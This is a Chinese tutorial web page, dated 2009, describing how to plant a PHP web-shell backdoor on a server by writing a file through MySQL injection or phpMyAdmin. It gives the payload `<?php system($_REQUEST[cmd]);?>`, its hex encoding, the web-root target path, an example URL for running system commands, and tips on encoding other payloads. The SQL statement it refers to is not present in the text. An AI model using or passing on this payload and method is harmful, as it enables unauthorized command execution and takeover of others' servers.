当前位置: 首页 > 图文教程 > 数据库 > MYSQL > 运用Mysql语句生成后门木马的具体方法

MYSQL
MYSQL教程:如何选择正确的数据列类型
MYSQL教程:表达式操作符和数据类型转换
MYSQL教程:索引和查询优化程序
MYSQL教程:数据列类型与查询效率
MYSQL教程:查询优化之有效加载数据
MYSQL教程:查询优化之调度和锁定
MYSQL教程:服务器优化和硬件优化
MYSQL教程:数据目录
MYSQL教程:数据表在系统中表现形式
MYSQL教程:数据表最大尺寸限制
MYSQL教程:状态文件和日志文件
MYSQL教程:调整MySQL数据目录位置
MYSQL教程:数据库安全管理
MYSQL教程:MYSQL启动与退出以及链接故障恢复
MYSQL教程:MySQL用户帐号管理
MYSQL教程:日志文件管理
MYSQL教程:MySQL的一些优化配置
MYSQL教程:优化服务器参数设置
MYSQL教程:运行多个MySQL服务器
MYSQL教程:MySQL服务器镜像配置

MYSQL 中的 运用Mysql语句生成后门木马的具体方法


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-17   浏览: 49 ::
收藏到网摘: n/a

通过Mysql 的语句生成后门木马的方法:

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

2 3 <?php system($_REQUEST[cmd]);?>

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!

问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?

答:就是下面代码中的十六进制编码,

<?php system($_REQUEST[cmd]);?>

如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!